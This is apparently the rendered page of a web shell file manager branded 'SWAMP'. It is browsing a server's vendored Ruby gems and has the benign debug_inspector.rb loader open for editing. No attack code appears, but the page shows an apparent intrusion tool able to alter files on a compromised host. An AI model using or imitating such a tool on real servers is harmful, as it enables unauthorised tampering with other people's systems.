░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
pplmvsvm
LOCATION:
/var/www/canvas/vendor/bundle/ruby/3.1.0/gems/debug_inspector-1.1.0/lib
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: debug_inspector.rb
require 'rbconfig' dlext = RbConfig::CONFIG['DLEXT'] begin # If the installation task did its job, the extension is in lib/ next to this file. require "debug_inspector.#{dlext}" # We only want to define constants if the extension has loaded. require_relative "rubyvm/debug_inspector/version" rescue LoadError begin # If not, maybe the extension is in ext/ require_relative "../ext/debug_inspector/debug_inspector.#{dlext}" # We only want to define constants if the extension has loaded. require_relative "rubyvm/debug_inspector/version" rescue LoadError => e puts "debug_inspector extension was not loaded" end end
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📁 rubyvm/
DIR
—
2023-09-24 03:47
📄 debug_inspector.rb
RB
649 B
2023-09-24 03:47
EDIT
📄 debug_inspector.so
SO
35 KB
2023-09-24 03:47
EDIT